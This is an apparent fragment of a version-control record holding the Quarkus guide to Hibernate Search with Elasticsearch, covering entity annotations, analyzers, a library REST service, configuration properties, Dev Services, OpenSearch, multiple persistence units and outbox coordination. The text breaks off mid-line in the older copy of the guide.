<5>\nquarkus.hibernate-search-orm.elasticsearch.analysis.configurer=bean:myAnalysisConfigurer <6>\n%dev.quarkus.hibernate-search-orm.schema-management.strategy=drop-and-create <7>\n%test.quarkus.hibernate-search-orm.schema-management.strategy=drop-and-create <7>\nquarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy=sync <8>\n\n%prod.quarkus.datasource.jdbc.url=jdbc:postgresql:\/\/localhost\/quarkus_test <9>\n%prod.quarkus.datasource.username=quarkus_test\n%prod.quarkus.datasource.password=quarkus_test\n%prod.hibernate-search-orm.elasticsearch.hosts=localhost:9200 <9>\n----\n<1> We won't use SSL, so we disable it to have a more compact native executable.\n<2> Let's create a PostgreSQL datasource.\n<3> In dev mode and in tests, we will drop and recreate the schema on startup.\n<4> We load some initial data on startup.\n<5> We need to tell Hibernate Search about the version of Elasticsearch we will use.\nIt is important because there are significant differences between Elasticsearch mapping syntax depending on the version.\nSince the mapping is created at build time to reduce startup time, Hibernate Search cannot connect to the cluster to automatically detect the version.\nNote that, for OpenSearch, you need to prefix the version with `opensearch:`; see <<opensearch>>.\n<6> We point to the custom `AnalysisConfigurer` which defines the configuration of our analyzers and normalizers.\n<7> In dev mode and in tests, we will drop and recreate the index on startup.\n<8> This means that we wait for the entities to be searchable before considering a write complete.\nOn a production setup, the `write-sync` default will provide better performance.\nUsing `sync` is especially important when testing as you need the entities to be searchable immediately.\n<9> For development and tests, we rely on <<dev-services,Dev Services>>,\nwhich means Quarkus will start a PostgreSQL database and Elasticsearch cluster automatically.\nIn production mode, however,\nyou will want to start a PostgreSQL database and Elasticsearch cluster manually,\nwhich is why we provide Quarkus with this connection info in the `prod` profile (`%prod.` prefix).\n\n[TIP]\nFor more information about the Hibernate Search extension configuration please refer to the <<configuration-reference, Configuration Reference>>.\n\n[[dev-services]]\n=== Dev Services (Configuration Free Databases)\nQuarkus supports a feature called Dev Services that allows you to start various containers without any config.\nIn the case of Elasticsearch this support extends to the default Elasticsearch connection.\nWhat that means practically, is that if you have not configured `quarkus.hibernate-search-orm.elasticsearch.hosts` Quarkus will automatically\nstart an Elasticsearch container when running tests or in xref:dev-mode-differences.adoc[dev mode], and automatically configure the connection.\n\nWhen running the production version of the application, the Elasticsearch connection needs to be configured as normal,\nso if you want to include a production database config in your `application.properties` and continue to use Dev Services\nwe recommend that you use the `%prod.` profile to define your Elasticsearch settings.\n\nNOTE: Dev Services for Elasticsearch is currently unable to start multiple clusters concurrently, so it only works with the default backend of the default persistence unit: named persistence units or named backends won't be able to take advantage of Dev Services for Elasticsearch.\n\nFor more information you can read the xref:elasticsearch-dev-services.adoc[Dev Services for Elasticsearch guide].\n\n== Creating a frontend\n\nNow let's add a simple web page to interact with our `LibraryResource`.\nQuarkus automatically serves static resources located under the `META-INF\/resources` directory.\nIn the `src\/main\/resources\/META-INF\/resources` directory, overwrite the existing `index.html` file with the content from this\n{quickstarts-blob-url}\/hibernate-search-orm-elasticsearch-quickstart\/src\/main\/resources\/META-INF\/resources\/index.html[index.html] file.\n\n== Automatic import script\n\nFor the purpose of this demonstration, let's import an initial dataset.\n\nLet's create a `src\/main\/resources\/import.sql` file with the following content:\n\n[source,sql]\n----\nINSERT INTO author(id, firstname, lastname) VALUES (nextval('hibernate_sequence'), 'John', 'Irving');\nINSERT INTO author(id, firstname, lastname) VALUES (nextval('hibernate_sequence'), 'Paul', 'Auster');\n\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The World According to Garp', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Hotel New Hampshire', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Cider House Rules', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'A Prayer for Owen Meany', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Last Night in Twisted River', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'In One Person', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Avenue of Mysteries', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The New York Trilogy', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Mr. Vertigo', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Brooklyn Follies', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Invisible', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Sunset Park', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), '4 3 2 1', 2);\n----\n\n== Time to play with your application\n\nYou can now interact with your REST service:\n\n:devtools-wrapped:\n\n * start your Quarkus application with:\n+\ninclude::{includes}\/devtools\/dev.adoc[]\n * open a browser to `http:\/\/localhost:8080\/`\n * search for authors or book titles (we initialized some data for you)\n * create new authors and books and search for them too\n\n:!devtools-wrapped:\n\nAs you can see, all your updates are automatically synchronized to the Elasticsearch cluster.\n\n[[opensearch]]\n== OpenSearch compatibility\n\nHibernate Search is compatible with both https:\/\/www.elastic.co\/elasticsearch[Elasticsearch]\nand https:\/\/www.opensearch.org\/[OpenSearch],\nbut it assumes it is working with an Elasticsearch cluster by default.\n\nTo have Hibernate Search work with an OpenSearch cluster instead,\nlink:{hibernate-search-doc-prefix}#backend-elasticsearch-configuration-version[prefix the configured version with `opensearch:`],\nas shown below.\n\n[source,properties]\n----\nquarkus.hibernate-search-orm.elasticsearch.version=opensearch:1.2\n----\n\nAll other configuration options and APIs are exactly the same as with Elasticsearch.\n\nYou can find more information about compatible distributions and versions of Elasticsearch in\nlink:{hibernate-search-doc-prefix}#getting-started-compatibility[this section of Hibernate Search's reference documentation].\n\n[[multiple-persistence-units]]\n== Multiple persistence units\n\n=== Configuring multiple persistence units\n\nWith the Hibernate ORM extension,\nxref:hibernate-orm.adoc#multiple-persistence-units[you can set up multiple persistence units],\neach with its own datasource and configuration.\n\nIf you do declare multiple persistence units,\nyou will also configure Hibernate Search separately for each persistence unit.\n\nThe properties at the root of the `quarkus.hibernate-search-orm.` namespace define the default persistence unit.\nFor instance, the following snippet defines a default datasource and a default persistence unit,\nand sets the Elasticsearch host for that persistence unit to `es1.mycompany.com:9200`.\n\n[source,properties]\n----\nquarkus.datasource.db-kind=h2\nquarkus.datasource.jdbc.url=jdbc:h2:mem:default;DB_CLOSE_DELAY=-1\n\nquarkus.hibernate-orm.dialect=org.hibernate.dialect.H2Dialect\n\nquarkus.hibernate-search-orm.elasticsearch.hosts=es1.mycompany.com:9200\nquarkus.hibernate-search-orm.elasticsearch.version=7\n----\n\nUsing a map based approach, it is also possible to configure named persistence units:\n\n[source,properties]\n----\nquarkus.datasource.\"users\".db-kind=h2 <1>\nquarkus.datasource.\"users\".jdbc.url=jdbc:h2:mem:users;DB_CLOSE_DELAY=-1\n\nquarkus.datasource.\"inventory\".db-kind=h2 <2>\nquarkus.datasource.\"inventory\".jdbc.url=jdbc:h2:mem:inventory;DB_CLOSE_DELAY=-1\n\nquarkus.hibernate-orm.\"users\".datasource=users <3>\nquarkus.hibernate-orm.\"users\".packages=org.acme.model.user\n\nquarkus.hibernate-orm.\"inventory\".datasource=inventory <4>\nquarkus.hibernate-orm.\"inventory\".packages=org.acme.model.inventory\n\nquarkus.hibernate-search-orm.\"users\".elasticsearch.hosts=es1.mycompany.com:9200 <5>\nquarkus.hibernate-search-orm.\"users\".elasticsearch.version=7\n\nquarkus.hibernate-search-orm.\"inventory\".elasticsearch.hosts=es2.mycompany.com:9200 <6>\nquarkus.hibernate-search-orm.\"inventory\".elasticsearch.version=7\n----\n<1> Define a datasource named `users`.\n<2> Define a datasource named `inventory`.\n<3> Define a persistence unit called `users` pointing to the `users` datasource.\n<4> Define a persistence unit called `inventory` pointing to the `inventory` datasource.\n<5> Configure Hibernate Search for the `users` persistence unit,\nsetting the Elasticsearch host for that persistence unit to `es1.mycompany.com:9200`.\n<6> Configure Hibernate Search for the `inventory` persistence unit,\nsetting the Elasticsearch host for that persistence unit to `es2.mycompany.com:9200`.\n\n[[multiple-persistence-units-attaching-model-classes]]\n=== Attaching model classes to persistence units\n\nFor each persistence unit, Hibernate Search will only consider indexed entities that are attached to that persistence unit.\nEntities are attached to a persistence unit by\nxref:hibernate-orm.adoc#multiple-persistence-units-attaching-model-classes[configuring the Hibernate ORM extension].\n\n[[multiple-persistence-units-attaching-cdi]]\n== CDI integration\n\nYou can inject Hibernate Search's main entry points, `SearchSession` and `SearchMapping`, using CDI:\n\n[source,java]\n----\n@Inject\nSearchSession searchSession;\n----\n\nThis will inject the `SearchSession` of the default persistence unit.\n\nTo inject the `SearchSession` of a named persistence unit (`users` in our example),\njust add a qualifier:\n\n[source,java]\n----\n@Inject\n@PersistenceUnit(\"users\") <1>\nSearchSession searchSession;\n----\n<1> This is the `@io.quarkus.hibernate.orm.PersistenceUnit` annotation.\n\nYou can inject the `SearchMapping` of a named persistence unit using the exact same mechanism:\n\n[source,java]\n----\n@Inject\n@PersistenceUnit(\"users\")\nSearchMapping searchMapping;\n----\n\n== Building a native executable\n\nYou can build a native executable with the usual command `.\/mvnw package -Pnative`.\n\n[NOTE]\n====\nAs usual with native executable compilation, this operation consumes a lot of memory.\n\nIt might be safer to stop the two containers while you are building the native executable and start them again once you are done.\n====\n\nRunning it is as simple as executing `.\/target\/hibernate-search-orm-elasticsearch-quickstart-1.0.0-SNAPSHOT-runner`.\n\nYou can then point your browser to `http:\/\/localhost:8080\/` and use your application.\n\n[NOTE]\n====\nThe startup is a bit slower than usual: it is mostly due to us dropping and recreating the database schema and the Elasticsearch mapping every time at startup.\nWe also inject some data and execute the mass indexer.\n\nIn a real life application, it is obviously something you won't do at startup.\n====\n\n[[offline-startup]]\n== Offline startup\n\nBy default, Hibernate Search sends a few requests to the Elasticsearch cluster on startup.\nIf the Elasticsearch cluster is not necessarily up and running when Hibernate Search starts,\nthis could cause a startup failure.\n\nTo address this, you can configure Hibernate Search to not send any request on startup:\n\n* Disable Elasticsearch version checks on startup by setting the configuration property\n link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.elasticsearch.version-check.enabled[`quarkus.hibernate-search-orm.elasticsearch.version-check.enabled`]\n to `false`.\n* Disable schema management on startup by setting the configuration property\n link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.schema-management.strategy[`quarkus.hibernate-search-orm.schema-management.strategy`]\n to `none`.\n\nOf course, even with this configuration, Hibernate Search still won't be able to index anything or run search queries\nuntil the Elasticsearch cluster becomes accessible.\n\n[IMPORTANT]\n====\nIf you disable automatic schema creation by setting `quarkus.hibernate-search-orm.schema-management.strategy` to `none`,\nyou will have to create the schema manually at some point before your application starts persisting\/updating entities\nand executing search requests.\n\nSee link:{hibernate-search-doc-prefix}#mapper-orm-schema-management-manager[this section of the reference documentation]\nfor more information.\n====\n\n[[coordination]]\n== Coordination through outbox polling\n\n[CAUTION]\n====\nCoordination through outbox polling is considered preview.\n\nIn _preview_, backward compatibility and presence in the ecosystem is not guaranteed.\nSpecific improvements might require changing configuration or APIs, or even storage formats,\nand plans to become _stable_ are under way.\nFeedback is welcome on our https:\/\/groups.google.com\/d\/forum\/quarkus-dev[mailing list]\nor as issues in our https:\/\/github.com\/quarkusio\/quarkus\/issues[GitHub issue tracker].\n====\n\nWhile it\u2019s technically possible to use Hibernate Search and Elasticsearch in distributed applications,\nby default they suffer from\nlink:{hibernate-search-doc-prefix}#architecture-examples-no-coordination-elasticsearch-pros-and-cons[a few limitations].\n\nThese limitations are the result of Hibernate Search not coordinating between threads or application nodes by default.\n\nIn order to get rid of these limitations, you can\nlink:{hibernate-search-doc-prefix}#architecture-examples-outbox-polling-elasticsearch[use the `outbox-polling` coordination strategy].\nThis strategy creates an outbox table in the database to push entity change events to,\nand relies on a background processor to consume these events and perform automatic indexing.\n\nTo enable the `outbox-polling` coordination strategy, an additional extension is required:\n\n:add-extension-extensions: hibernate-search-orm-coordination-outbox-polling\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nOnce the extension is there, you will need to explicitly select the `outbox-polling` strategy\nby setting link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.coordination.strategy[`quarkus.hibernate-search-orm.coordination.strategy`]\nto `outbox-polling`.\n\nFinally, you will need to make sure that the Hibernate ORM entities added by Hibernate Search\n(to represent the outbox and agents) have corresponding tables\/sequences in your database:\n\n* If you are just starting with your application\nand intend to xref:hibernate-orm.adoc#dev-mode[let Hibernate ORM generate your database schema],\nthen no worries: the entities required by Hibernate Search will be included in the generated schema.\n* Otherwise, you must\nlink:{hibernate-search-doc-prefix}#coordination-outbox-polling-schema[manually alter your schema to add the necessary tables\/sequences].\n\nOnce you are done with the above, you're ready to use Hibernate Search with an outbox.\nDon't change any code, and just start your application:\nit will automatically detect when multiple applications are connected to the same database,\nand coordinate the index updates accordingly.\n\n[NOTE]\n====\nHibernate Search mostly behaves the same when using the `outbox-polling` coordination strategy\nas when not using it: application code (persisting entities, searching, etc.) should not require any change.\n\nHowever, there is one key difference: index updates are necessarily asynchronous;\nthey are guaranteed to happen _eventually_, but not immediately.\n\nThis means in particular that the configuration property\nlink:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy[`quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy`]\ncannot be set when using the `outbox-polling` coordination strategy:\nHibernate Search will always behave as if this property was set to `write-sync` (the default).\n\nThis behavior is consistent with Elasticsearch's\nhttps:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/near-real-time.html[near-real-time search]\nand the recommended way of using Hibernate Search even when coordination is disabled.\n====\n\nFor more information about coordination in Hibernate Search,\nsee link:{hibernate-search-doc-prefix}#coordination[this section of the reference documentation].\n\nFor more information about configuration options related to coordination,\nsee <<configuration-reference-coordination-outbox-polling>>.\n\n[[aws-request-signing]]\n== [[configuration-reference-aws]] AWS request signing\n\nIf you need to use https:\/\/docs.aws.amazon.com\/elasticsearch-service\/[Amazon\u2019s managed Elasticsearch service],\nyou will find it requires a proprietary authentication method involving request signing.\n\nYou can enable AWS request signing in Hibernate Search by adding a dedicated extension to your project and configuring it.\n\nSee link:{hibernate-search-orm-elasticsearch-aws-guide}#aws-configuration-reference[the documentation for the Hibernate Search ORM + Elasticsearch AWS extension]\nfor more information.\n\n== Further reading\n\nIf you are interested in learning more about Hibernate Search 6,\nthe Hibernate team publishes link:{hibernate-search-doc-prefix}[an extensive reference documentation].\n\n== FAQ\n\n=== Why Elasticsearch only?\n\nHibernate Search supports both a Lucene backend and an Elasticsearch backend.\n\nIn the context of Quarkus and to build microservices, we thought the latter would make more sense.\nThus, we focused our efforts on it.\n\nWe don't have plans to support the Lucene backend in Quarkus for now.\n\n[[configuration-reference]]\n== Hibernate Search Configuration Reference\n\n[[configuration-reference-main]]\n=== Main Configuration\n\ninclude::{generated-dir}\/config\/quarkus-hibernate-search-orm-elasticsearch.adoc[leveloffset=+1, opts=optional]\n\n[NOTE]\n[[bean-reference-note-anchor]]\n.About bean references\n====\nWhen referencing beans using a string value in configuration properties, that string is parsed.\n\nHere are the most common formats:\n\n* `bean:` followed by the name of a `@Named` CDI bean.\nFor example `bean:myBean`.\n* `class:` followed by the fully-qualified name of a class, to be instantiated through CDI if it's a CDI bean,\nor through its public, no-argument constructor otherwise.\nFor example `class:com.mycompany.MyClass`.\n* An arbitrary string referencing a built-in implementation.\nAvailable values are detailed in the documentation of each configuration property,\nsuch as `async`\/`read-sync`\/`write-sync`\/`sync` for\n<<quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy,`quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy`>>.\n\nOther formats are also accepted, but are only useful for advanced use cases.\nSee link:{hibernate-search-doc-prefix}#configuration-bean-reference-parsing[this section of Hibernate Search's reference documentation]\nfor more information.\n====\n\n:no-duration-note: true\n\n[[configuration-reference-coordination-outbox-polling]]\n=== Configuration of coordination with outbox polling\n\nNOTE: These configuration properties require an additional extension. See <<coordination>>.\n\ninclude::{generated-dir}\/config\/quarkus-hibernate-search-orm-coordination-outboxpolling.adoc[leveloffset=+1, opts=optional]\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Hibernate Search guide\n:hibernate-search-doc-prefix: https:\/\/docs.jboss.org\/hibernate\/search\/6.1\/reference\/en-US\/html_single\/\ninclude::.\/attributes.adoc[]\n\nYou have a Hibernate ORM-based application? You want to provide a full-featured full-text search to your users? You're at the right place.\n\nWith this guide, you'll learn how to synchronize your entities to an Elasticsearch or OpenSearch cluster in a heartbeat with Hibernate Search.\nWe will also explore how you can query your Elasticsearch or OpenSearch cluster using the Hibernate Search API.\n\n== Prerequisites\n\n:prerequisites-time: 20 minutes\n:prerequisites-docker:\ninclude::{includes}\/prerequisites.adoc[]\n\n== Architecture\n\nThe application described in this guide allows to manage a (simple) library: you manage authors and their books.\n\nThe entities are stored in a PostgreSQL database and indexed in an Elasticsearch cluster.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `hibernate-search-orm-elasticsearch-quickstart` {quickstarts-tree-url}\/hibernate-search-orm-elasticsearch-quickstart[directory].\n\n[NOTE]\n====\nThe provided solution contains a few additional elements such as tests and testing infrastructure.\n====\n\n== Creating the Maven project\n\nFirst, we need a new project. Create a new project with the following command:\n\n:create-app-artifact-id: hibernate-search-orm-elasticsearch-quickstart\n:create-app-extensions: hibernate-orm-panache,jdbc-postgresql,hibernate-search-orm-elasticsearch,resteasy-reactive-jackson\ninclude::{includes}\/devtools\/create-app.adoc[]\n\nThis command generates a Maven structure importing the following extensions:\n\n * Hibernate ORM with Panache,\n * the PostgreSQL JDBC driver,\n * Hibernate Search + Elasticsearch,\n * RESTEasy Reactive and Jackson.\n\nIf you already have your Quarkus project configured, you can add the `hibernate-search-orm-elasticsearch` extension\nto your project by running the following command in your project base directory:\n\n:add-extension-extensions: hibernate-search-orm-elasticsearch\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nThis will add the following to your `pom.xml`:\n\n[source,xml,role=\"primary asciidoc-tabs-target-sync-cli asciidoc-tabs-target-sync-maven\"]\n.pom.xml\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-search-orm-elasticsearch<\/artifactId>\n<\/dependency>\n----\n\n[source,gradle,role=\"secondary asciidoc-tabs-target-sync-gradle\"]\n.build.gradle\n----\nimplementation(\"io.quarkus:quarkus-hibernate-search-orm-elasticsearch\")\n----\n\n== Creating the bare entities\n\nFirst, let's create our Hibernate ORM entities `Book` and `Author` in the `model` subpackage.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.List;\nimport java.util.Objects;\n\nimport javax.persistence.CascadeType;\nimport javax.persistence.Entity;\nimport javax.persistence.FetchType;\nimport javax.persistence.OneToMany;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\npublic class Author extends PanacheEntity { \/\/ <1>\n\n public String firstName;\n\n public String lastName;\n\n @OneToMany(mappedBy = \"author\", cascade = CascadeType.ALL, orphanRemoval = true, fetch = FetchType.EAGER) \/\/ <2>\n public List<Book> books;\n\n @Override\n public boolean equals(Object o) {\n if (this == o) {\n return true;\n }\n if (!(o instanceof Author)) {\n return false;\n }\n\n Author other = (Author) o;\n\n return Objects.equals(id, other.id);\n }\n\n @Override\n public int hashCode() {\n return 31;\n }\n}\n----\n<1> We are using Hibernate ORM with Panache, it is not mandatory.\n<2> We are loading these elements eagerly so that they are present in the JSON output.\nIn a real world application, you should probably use a DTO approach.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.Objects;\n\nimport javax.persistence.Entity;\nimport javax.persistence.ManyToOne;\n\nimport com.fasterxml.jackson.annotation.JsonIgnore;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\npublic class Book extends PanacheEntity {\n\n public String title;\n\n @ManyToOne\n @JsonIgnore <1>\n public Author author;\n\n @Override\n public boolean equals(Object o) {\n if (this == o) {\n return true;\n }\n if (!(o instanceof Book)) {\n return false;\n }\n\n Book other = (Book) o;\n\n return Objects.equals(id, other.id);\n }\n\n @Override\n public int hashCode() {\n return 31;\n }\n}\n----\n<1> We mark this property with `@JsonIgnore` to avoid infinite loops when serializing with Jackson.\n\n== Initializing the REST service\n\nWhile everything is not yet set up for our REST service, we can initialize it with the standard CRUD operations we will need.\n\nCreate the `org.acme.hibernate.search.elasticsearch.LibraryResource` class:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch;\n\nimport java.util.List;\nimport java.util.Optional;\n\nimport javax.enterprise.event.Observes;\nimport javax.inject.Inject;\nimport javax.transaction.Transactional;\nimport javax.ws.rs.DELETE;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.PUT;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.core.MediaType;\n\nimport org.acme.hibernate.search.elasticsearch.model.Author;\nimport org.acme.hibernate.search.elasticsearch.model.Book;\nimport org.hibernate.search.mapper.orm.session.SearchSession;\nimport org.jboss.resteasy.reactive.RestForm;\nimport org.jboss.resteasy.reactive.RestQuery;\n\nimport io.quarkus.runtime.StartupEvent;\n\n@Path(\"\/library\")\npublic class LibraryResource {\n\n @PUT\n @Path(\"book\")\n @Transactional\n @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n public void addBook(@RestForm String title, @RestForm Long authorId) {\n Author author = Author.findById(authorId);\n if (author == null) {\n return;\n }\n\n Book book = new Book();\n book.title = title;\n book.author = author;\n book.persist();\n\n author.books.add(book);\n author.persist();\n }\n\n @DELETE\n @Path(\"book\/{id}\")\n @Transactional\n public void deleteBook(Long id) {\n Book book = Book.findById(id);\n if (book != null) {\n book.author.books.remove(book);\n book.delete();\n }\n }\n\n @PUT\n @Path(\"author\")\n @Transactional\n @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n public void addAuthor(@RestForm String firstName, @RestForm String lastName) {\n Author author = new Author();\n author.firstName = firstName;\n author.lastName = lastName;\n author.persist();\n }\n\n @POST\n @Path(\"author\/{id}\")\n @Transactional\n @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n public void updateAuthor(Long id, @RestForm String firstName, @RestForm String lastName) {\n Author author = Author.findById(id);\n if (author == null) {\n return;\n }\n author.firstName = firstName;\n author.lastName = lastName;\n author.persist();\n }\n\n @DELETE\n @Path(\"author\/{id}\")\n @Transactional\n public void deleteAuthor(Long id) {\n Author author = Author.findById(id);\n if (author != null) {\n author.delete();\n }\n }\n}\n----\n\nNothing out of the ordinary here: it is just good old Hibernate ORM with Panache operations in a REST service.\n\nIn fact, the interesting part is that we will need to add very few elements to make our full text search application working.\n\n== Using Hibernate Search annotations\n\nLet's go back to our entities.\n\nEnabling full text search capabilities for them is as simple as adding a few annotations.\n\nLet's edit the `Book` entity again to include this content:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.Objects;\n\nimport javax.persistence.Entity;\nimport javax.persistence.ManyToOne;\n\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.FullTextField;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.Indexed;\n\nimport com.fasterxml.jackson.annotation.JsonIgnore;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\n@Indexed \/\/ <1>\npublic class Book extends PanacheEntity {\n\n @FullTextField(analyzer = \"english\") \/\/ <2>\n public String title;\n\n @ManyToOne\n @JsonIgnore\n public Author author;\n\n \/\/ Preexisting equals()\/hashCode() methods\n}\n----\n<1> First, let's use the `@Indexed` annotation to register our `Book` entity as part of the full text index.\n<2> The `@FullTextField` annotation declares a field in the index specifically tailored for full text search.\nIn particular, we have to define an analyzer to split and analyze the tokens (~ words) - more on this later.\n\nNow that our books are indexed, we can do the same for the authors.\n\nOpen the `Author` class and include the content below.\n\nThings are quite similar here: we use the `@Indexed`, `@FullTextField` and `@KeywordField` annotations.\n\nThere are a few differences\/additions though. Let's check them out.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.List;\nimport java.util.Objects;\n\nimport javax.persistence.CascadeType;\nimport javax.persistence.Entity;\nimport javax.persistence.FetchType;\nimport javax.persistence.OneToMany;\n\nimport org.hibernate.search.engine.backend.types.Sortable;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.FullTextField;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.Indexed;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.IndexedEmbedded;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.KeywordField;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\n@Indexed\npublic class Author extends PanacheEntity {\n\n @FullTextField(analyzer = \"name\") \/\/ <1>\n @KeywordField(name = \"firstName_sort\", sortable = Sortable.YES, normalizer = \"sort\") \/\/ <2>\n public String firstName;\n\n @FullTextField(analyzer = \"name\")\n @KeywordField(name = \"lastName_sort\", sortable = Sortable.YES, normalizer = \"sort\")\n public String lastName;\n\n @OneToMany(mappedBy = \"author\", cascade = CascadeType.ALL, orphanRemoval = true, fetch = FetchType.EAGER)\n @IndexedEmbedded \/\/ <3>\n public List<Book> books;\n\n \/\/ Preexisting equals()\/hashCode() methods\n}\n----\n<1> We use a `@FullTextField` similar to what we did for `Book` but you'll notice that the analyzer is different - more on this later.\n<2> As you can see, we can define several fields for the same property.\nHere, we define a `@KeywordField` with a specific name.\nThe main difference is that a keyword field is not tokenized (the string is kept as one single token) but can be normalized (i.e. filtered) - more on this later.\nThis field is marked as sortable as our intention is to use it for sorting our authors.\n<3> The purpose of `@IndexedEmbedded` is to include the `Book` fields into the `Author` index.\nIn this case, we just use the default configuration: all the fields of the associated `Book` entities are included in the index (i.e. the `title` field).\nThe nice thing with `@IndexedEmbedded` is that it is able to automatically reindex an `Author` if one of its ``Book``s has been updated thanks to the bidirectional relation.\n`@IndexedEmbedded` also supports nested documents (using the `storage = NESTED` attribute), but we don't need it here.\nYou can also specify the fields you want to include in your parent index using the `includePaths` attribute if you don't want them all.\n\n== Analyzers and normalizers\n\n=== Introduction\n\nAnalysis is a big part of full text search: it defines how text will be processed when indexing or building search queries.\n\nThe role of analyzers is to split the text into tokens (~ words) and filter them (making it all lowercase and removing accents for instance).\n\nNormalizers are a special type of analyzers that keeps the input as a single token.\nIt is especially useful for sorting or indexing keywords.\n\nThere are a lot of bundled analyzers, but you can also develop your own for your own specific purposes.\n\nYou can learn more about the Elasticsearch analysis framework in the https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/analysis.html[Analysis section of the Elasticsearch documentation].\n\n=== Defining the analyzers used\n\nWhen we added the Hibernate Search annotations to our entities, we defined the analyzers and normalizers used.\nTypically:\n\n[source,java]\n----\n@FullTextField(analyzer = \"english\")\n----\n\n[source,java]\n----\n@FullTextField(analyzer = \"name\")\n----\n\n[source,java]\n----\n@KeywordField(name = \"lastName_sort\", sortable = Sortable.YES, normalizer = \"sort\")\n----\n\nWe use:\n\n * an analyzer called `name` for person names,\n * an analyzer called `english` for book titles,\n * a normalizer called `sort` for our sort fields\n\nbut we haven't set them up yet.\n\nLet's see how you can do it with Hibernate Search.\n\n[[analysis-configurer]]\n=== Setting up the analyzers\n\nIt is an easy task, we just need to create an implementation of `ElasticsearchAnalysisConfigurer`\n(and configure Quarkus to use it, more on that later).\n\nTo fulfill our requirements, let's create the following implementation:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.config;\n\nimport org.hibernate.search.backend.elasticsearch.analysis.ElasticsearchAnalysisConfigurationContext;\nimport org.hibernate.search.backend.elasticsearch.analysis.ElasticsearchAnalysisConfigurer;\n\nimport javax.enterprise.context.Dependent;\nimport javax.inject.Named;\n\n@Dependent\n@Named(\"myAnalysisConfigurer\") \/\/ <1>\npublic class AnalysisConfigurer implements ElasticsearchAnalysisConfigurer {\n\n @Override\n public void configure(ElasticsearchAnalysisConfigurationContext context) {\n context.analyzer(\"name\").custom() \/\/ <2>\n .tokenizer(\"standard\")\n .tokenFilters(\"asciifolding\", \"lowercase\");\n\n context.analyzer(\"english\").custom() \/\/ <3>\n .tokenizer(\"standard\")\n .tokenFilters(\"asciifolding\", \"lowercase\", \"porter_stem\");\n\n context.normalizer(\"sort\").custom() \/\/ <4>\n .tokenFilters(\"asciifolding\", \"lowercase\");\n }\n}\n----\n<1> We will need to reference the configurer from the configuration properties, so we make it a named bean.\n<2> This is a simple analyzer separating the words on spaces, removing any non-ASCII characters by its ASCII counterpart (and thus removing accents) and putting everything in lowercase.\nIt is used in our examples for the author's names.\n<3> We are a bit more aggressive with this one and we include some stemming: we will be able to search for `mystery` and get a result even if the indexed input contains `mysteries`.\nIt is definitely too aggressive for person names, but it is perfect for the book titles.\n<4> Here is the normalizer used for sorting. Very similar to our first analyzer, except we don't tokenize the words as we want one and only one token.\n\n== Adding full text capabilities to our REST service\n\nIn our existing `LibraryResource`, we just need to inject the `SearchSession`:\n\n[source,java]\n----\n @Inject\n SearchSession searchSession; \/\/ 